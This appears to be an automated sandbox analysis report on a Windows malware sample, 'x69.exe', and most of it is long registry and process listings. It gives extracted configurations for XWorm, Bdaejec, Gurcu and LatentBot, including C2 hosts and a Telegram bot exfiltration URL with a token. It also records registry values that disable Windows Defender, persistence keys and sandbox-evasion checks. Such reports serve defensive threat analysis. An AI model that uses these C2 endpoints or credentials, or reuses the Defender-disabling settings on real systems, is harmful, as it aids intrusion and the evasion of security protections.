Analysis
max time kernel: 102s
max time network: 108s
platform: windows10-2004_x64
resource: win10v2004-20250502-en
resource tags: arch:x64 arch:x86 image:win10v2004-20250502-en locale:en-us os:windows10-2004-x64 system
submitted: 19/05/2025, 21:14
Static task: static1
Behavioral task: behavioral1
Sample: x69.exe
Resource: win10v2004-20250502-en
General
Target: x69.exe
Size: 285KB
MD5: 20841606ce69632f258221219aeee09b
SHA1: b72918797186774598792c47b66d5857be59f576
SHA256: 1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83
SHA512: aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e
SSDEEP: 6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI
Malware Config
Extracted
Family: xworm
Version: 3.1
C2: grayhatgroupontop.zapto.org:1177
Install_directory: %AppData%
install_file: USB.exe
telegram: https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004

Extracted
Family: bdaejec
C2: ddos.dnsnb8.net

Extracted
Family: gurcu
C2: https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004

Extracted
Family: latentbot
C2: grayhatgroupontop.zapto.org
Signatures
Bdaejec family
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource | yara_rule
behavioral1/files/0x00080000000240eb-81.dat | disable_win_def
Detect Xworm Payload 2 IoCs
resource | yara_rule
behavioral1/files/0x0005000000022a80-21.dat | family_xworm
behavioral1/memory/980-23-0x0000000000FD0000-0x0000000000FE8000-memory.dmp | family_xworm
Detects Bdaejec Backdoor. 5 IoCs
Bdaejec is a backdoor written in C++.
resource | yara_rule
behavioral1/memory/2456-563-0x0000000000BB0000-0x0000000000BB9000-memory.dmp | family_bdaejec_backdoor
behavioral1/memory/4120-562-0x0000000000BB0000-0x0000000000BB9000-memory.dmp | family_bdaejec_backdoor
behavioral1/memory/4120-1553-0x0000000000BB0000-0x0000000000BB9000-memory.dmp | family_bdaejec_backdoor
behavioral1/memory/2456-1554-0x0000000000BB0000-0x0000000000BB9000-memory.dmp | family_bdaejec_backdoor
behavioral1/memory/2864-1555-0x00000000009D0000-0x00000000009D9000-memory.dmp | family_bdaejec_backdoor
Gurcu family
Latentbot family
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | reg.exe
Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Modifies security service 2 TTPs 2 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 4092 created 616 | 4092 | powershell.EXE | 5
Xworm family
pid | Process
1432 | powershell.exe
5032 | powershell.exe
3984 | powershell.exe
3756 | powershell.exe
3596 | powershell.exe
2412 | powershell.exe
3908 | powershell.exe
4080 | powershell.exe
4148 | powershell.exe
4828 | powershell.exe
3264 | powershell.exe
4148 | powershell.exe
4080 | powershell.exe
4308 | powershell.exe
2580 | powershell.exe
3572 | powershell.exe
2424 | powershell.exe
3708 | powershell.exe
4148 | powershell.exe
3192 | powershell.exe
3400 | powershell.exe
1700 | powershell.exe
2580 | powershell.exe
4088 | powershell.exe
4436 | powershell.exe
4692 | powershell.exe
1444 | powershell.exe
4148 | powershell.exe
1444 | powershell.exe
3400 | powershell.exe
3972 | powershell.exe
844 | powershell.exe
216 | powershell.exe
4056 | powershell.exe
1560 | powershell.exe
4092 | powershell.EXE
4824 | powershell.exe
3176 | powershell.exe
2840 | powershell.exe
1432 | powershell.exe
3956 | powershell.exe
2580 | powershell.exe
4172 | powershell.exe
Modifies Windows Firewall 2 TTPs 2 IoCs
pid | Process
3752 | netsh.exe
4160 | netsh.exe
resource | yara_rule
behavioral1/files/0x000b000000023f27-50.dat | aspack_v212_v242
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | wmiprvse.exe
Checks computer location settings 2 TTPs 4 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | x69Disable-winDefender.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | x69Disable-winDefender.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | x69.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | x69.exe
Drops startup file 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk | x69.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk | x69.exe
Executes dropped EXE 11 IoCs
pid | Process
980 | x69.exe
4556 | x69.exe
2612 | x69Disable-winDefender.exe
3432 | x69Disable-winDefender.exe
4120 | izTLZKj.exe
2456 | izTLZKj.exe
1864 | x69install.exe
2864 | iyMbXS.exe
3136 | x69install.exe
4600 | x69.exe
3352 | x69.exe
Adds Run key to start application 2 TTPs 4 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69Disable-winDefender = "C:\\Users\\Admin\\AppData\\Roaming\\x69Disable-winDefender.exe" | x69.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69install = "C:\\Users\\Admin\\AppData\\Roaming\\x69install.exe" | x69.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" | x69.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" | x69.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
20 | ip-api.com
Modifies Security services 2 TTPs 8 IoCs
Modifies the startup behavior of a security service.
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" | reg.exe
Drops file in System32 directory 10 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 4092 set thread context of 3508 | 4092 | powershell.EXE | 245
Drops file in Program Files directory 64 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | x69install.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | x69Disable-winDefender.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | x69Disable-winDefender.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | izTLZKj.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | izTLZKj.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | x69install.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | iyMbXS.exe
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | mousocoreworker.exe
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | mousocoreworker.exe
Modifies data under HKEY_USERS 60 IoCs
Modifies registry class 64 IoCs
description ioc Process
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c738c0f0-335a-47aa- = (binary value removed) RuntimeBroker.exe
Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe
Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72f4bfd5-a862-4f98- RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72f4bfd5-a862-4f98- RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72f4bfd5-a862-4f98- = "8324" RuntimeBroker.exe
Key deleted \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c204875d-0f97-4961- RuntimeBroker.exe
Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c204875d-0f97-4961- RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72f4bfd5-a862-4f98- = ac51fe2103c9db01 RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6a93f9f2-8ce6-4d28- = "0" RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6a93f9f2-8ce6-4d28- =
0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001fed672103c9db014d3f362203c9db014d3f362203c9db0108cb0d000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b35aeba920006465643630
62366538616135623137396539333132636361613739326635623663313863353239626462353532336233373665393934346437363863383437350000b20009000400efbeb35aeba9b35aeba92e000000000000000000000000000000000000000000000000005f866200640065006400360030006200360065003800610061003500620031003700390065003900330031003200630063006100610037003900320066003500620036006300310038006300350032003900620064006200350035003200330062003300370036006500390039003400340064003700360038006300380034003700350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000029696f831000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64656436306236653861613562313739653933313263636161373932663562366331386335323962646235353233623337366539393434643736386338343735000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000716a65746f707675000000000000000084ea00e572e50042b4785bbc30e0d5687ed62d3b6d27f01188efda1c34833c0084ea00e572e50042b4785bbc30e0d5687ed62d3b6d27f01188efda1c34833c00ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0033003600320033003600310037003700350034002d0034003000340033003700300031003600310031002d003700370035003500360034003500390039002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002fa3b82a000000000000d01200000000000000000000000000000000 
RuntimeBroker.exe
Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108f40b4-2f7a-4e2d- RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108f40b4-2f7a-4e2d- = d4781b2103c9db01 RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d89c48b-6c1e-428f- = "0" RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d89c48b-6c1e-428f- = (binary value removed) RuntimeBroker.exe
Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca181a0a-17d4-4b39- RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca181a0a-17d4-4b39- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca181a0a-17d4-4b39- = "\\\\?\\Volume{2AB8A32F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\b1f7ea5645e0dd8d96ad14dd6b470e9f01729817c174c333915df368649e3f60" RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c204875d-0f97-4961- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d89c48b-6c1e-428f- RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72f4bfd5-a862-4f98- = "0" RuntimeBroker.exe
Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e80abc91-9511-4cbf- RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b017c94e-35f3-4c1e- RuntimeBroker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b017c94e-35f3-4c1e- = "\\\\?\\Volume{2AB8A32F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7498ea2d5d6c358a2231f197d793b32e460fcb350816ddf5566b62417f0d1c45" RuntimeBroker.exe
Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9e0eb78c-c95d-4bdc- RuntimeBroker.exe
Key deleted \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108f40b4-2f7a-4e2d- RuntimeBroker.exe
Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e196ff71-cda8-4265- = "0" RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c738c0f0-335a-47aa- = "0" RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca181a0a-17d4-4b39- = 716f1d2203c9db01 RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca181a0a-17d4-4b39- = "0" RuntimeBroker.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c204875d-0f97-4961- = "8324" RuntimeBroker.exe
